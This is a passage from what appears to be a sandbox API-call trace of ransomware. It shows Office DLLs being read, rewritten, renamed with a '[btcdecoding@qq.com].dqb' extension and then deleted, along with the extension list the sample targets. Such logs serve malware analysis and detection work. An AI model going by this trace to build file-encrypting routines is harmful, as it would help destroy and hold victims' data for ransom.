hTemplateFile=0x0) returned 0x240 [0055.811] GetLastError () returned 0x0 [0055.811] ReadFile (in: hFile=0x184, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xa388, lpOverlapped=0x0) returned 1 [0055.814] WriteFile (in: hFile=0x240, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xa390, lpOverlapped=0x0) returned 1 [0055.815] ReadFile (in: hFile=0x184, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.815] WriteFile (in: hFile=0x240, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.815] SetEndOfFile (hFile=0x240) returned 1 [0055.815] CloseHandle (hObject=0x240) returned 1 [0055.815] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.815] SetEndOfFile (hFile=0x184) returned 1 [0055.816] CloseHandle (hObject=0x184) returned 1 [0055.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.817] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 1 [0055.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.817] lstrlenW (lpString=".doc") returned 4 [0055.817] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString=".docx") returned 5 [0055.817] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0055.817] lstrlenW (lpString=".pdf") returned 4 [0055.817] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString=".xls") returned 4 [0055.817] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString=".xlsx") returned 5 [0055.817] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0055.817] lstrlenW (lpString=".ppt") returned 4 [0055.817] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.817] lstrlenW (lpString=".zip") returned 4 [0055.817] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString=".rar") returned 4 [0055.817] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.817] lstrlenW (lpString=".bz2") returned 4 [0055.817] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.818] lstrlenW (lpString=".7z") returned 3 [0055.818] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString=".dbf") returned 4 [0055.818] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString=".1cd") returned 4 [0055.818] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString=".jpg") returned 4 [0055.818] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString=".doc") returned 4 [0055.818] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString=".docx") returned 5 [0055.818] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0055.818] lstrlenW (lpString=".pdf") returned 4 [0055.818] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString=".xls") returned 4 [0055.818] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString=".xlsx") returned 5 [0055.818] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0055.818] lstrlenW (lpString=".ppt") returned 4 [0055.818] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.818] lstrlenW (lpString=".zip") returned 4 [0055.818] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString=".rar") returned 4 [0055.818] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.818] lstrlenW (lpString=".bz2") returned 4 [0055.818] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.818] lstrlenW (lpString=".7z") returned 3 [0055.818] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.819] lstrlenW (lpString=".dbf") returned 4 [0055.819] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.819] lstrlenW (lpString=".1cd") returned 4 [0055.819] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0055.819] lstrlenW (lpString=".jpg") returned 4 [0055.819] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.819] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0055.819] lstrlenW (lpString="ACECORE.DLL") returned 11 [0055.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.821] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=3213192) returned 1 [0055.821] CloseHandle (hObject=0x184) returned 1 [0055.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll")) returned 0x20 [0055.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0055.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0055.822] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0055.822] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0055.822] ReadFile (in: hFile=0x184, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.826] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0055.826] ReadFile (in: hFile=0x184, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.834] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0055.834] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0055.834] ReadFile (in: hFile=0x184, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.853] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.853] WriteFile (in: hFile=0x184, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0056.068] SetEndOfFile (hFile=0x184) returned 1 [0056.068] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ff24f8 [0056.072] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0056.072] WriteFile (in: hFile=0x184, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.074] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0056.074] WriteFile (in: hFile=0x184, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.078] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0056.078] WriteFile (in: hFile=0x184, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.083] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ff24f8 | out: hHeap=0x570000) returned 1 [0056.083] CloseHandle (hObject=0x184) returned 1 [0056.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.084] lstrlenW (lpString=".doc") returned 4 [0056.084] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString=".docx") returned 5 [0056.084] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0056.084] lstrlenW (lpString=".pdf") returned 4 [0056.084] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString=".xls") returned 4 [0056.084] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString=".xlsx") returned 5 [0056.084] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0056.084] lstrlenW (lpString=".ppt") returned 4 [0056.084] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.084] lstrlenW (lpString=".zip") returned 4 [0056.084] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString=".rar") returned 4 [0056.084] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.084] lstrlenW (lpString=".bz2") returned 4 [0056.084] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.084] lstrlenW (lpString=".7z") returned 3 [0056.084] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.084] lstrlenW (lpString=".dbf") returned 4 [0056.084] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.084] lstrlenW (lpString=".1cd") returned 4 [0056.084] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString=".jpg") returned 4 [0056.085] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString=".doc") returned 4 [0056.085] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString=".docx") returned 5 [0056.085] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0056.085] lstrlenW (lpString=".pdf") returned 4 [0056.085] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString=".xls") returned 4 [0056.085] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString=".xlsx") returned 5 [0056.085] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0056.085] lstrlenW (lpString=".ppt") returned 4 [0056.085] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString=".zip") returned 4 [0056.085] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString=".rar") returned 4 [0056.085] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.085] lstrlenW (lpString=".bz2") returned 4 [0056.085] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.085] lstrlenW (lpString=".7z") returned 3 [0056.085] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString=".dbf") returned 4 [0056.085] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.085] lstrlenW (lpString=".1cd") returned 4 [0056.085] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0056.086] lstrlenW (lpString=".jpg") returned 4 [0056.086] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.086] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.086] lstrlenW (lpString="ACEEXCH.DLL") returned 11 [0056.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.086] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=442272) returned 1 [0056.086] CloseHandle (hObject=0x184) returned 1 [0056.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 0x20 [0056.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.087] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.087] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0056.087] GetLastError () returned 0x0 [0056.087] ReadFile (in: hFile=0x184, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x6bfa0, lpOverlapped=0x0) returned 1 [0056.428] WriteFile (in: hFile=0x228, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x6bfb0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x6bfb0, lpOverlapped=0x0) returned 1 [0056.436] ReadFile (in: hFile=0x184, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.436] WriteFile (in: hFile=0x228, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.437] SetEndOfFile (hFile=0x228) returned 1 [0056.437] CloseHandle (hObject=0x228) returned 1 [0056.437] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.437] SetEndOfFile (hFile=0x184) returned 1 [0056.441] CloseHandle (hObject=0x184) returned 1 [0056.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.441] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 1 [0056.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.441] lstrlenW (lpString=".doc") returned 4 [0056.441] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.441] lstrlenW (lpString=".docx") returned 5 [0056.441] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0056.441] lstrlenW (lpString=".pdf") returned 4 [0056.441] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.441] lstrlenW (lpString=".xls") returned 4 [0056.441] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.441] lstrlenW (lpString=".xlsx") returned 5 [0056.442] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0056.442] lstrlenW (lpString=".ppt") returned 4 [0056.442] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString=".zip") returned 4 [0056.442] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString=".rar") returned 4 [0056.442] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString=".bz2") returned 4 [0056.442] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.442] lstrlenW (lpString=".7z") returned 3 [0056.442] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString=".dbf") returned 4 [0056.442] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString=".1cd") returned 4 [0056.442] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString=".jpg") returned 4 [0056.442] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.442] lstrlenW (lpString=".doc") returned 4 [0056.442] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString=".docx") returned 5 [0056.442] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0056.442] lstrlenW (lpString=".pdf") returned 4 [0056.442] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString=".xls") returned 4 [0056.442] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.442] lstrlenW (lpString=".xlsx") returned 5 [0056.443] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0056.443] lstrlenW (lpString=".ppt") returned 4 [0056.443] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.443] lstrlenW (lpString=".zip") returned 4 [0056.443] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.443] lstrlenW (lpString=".rar") returned 4 [0056.443] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.443] lstrlenW (lpString=".bz2") returned 4 [0056.443] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.443] lstrlenW (lpString=".7z") returned 3 [0056.443] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.443] lstrlenW (lpString=".dbf") returned 4 [0056.443] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.443] lstrlenW (lpString=".1cd") returned 4 [0056.443] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0056.443] lstrlenW (lpString=".jpg") returned 4 [0056.443] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.443] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.443] lstrlenW (lpString="ACEOLEDB.DLL") returned 12 [0056.443] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0057.791] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=537504) returned 1 [0057.791] CloseHandle (hObject=0x21c) returned 1 [0057.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 0x20 [0057.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 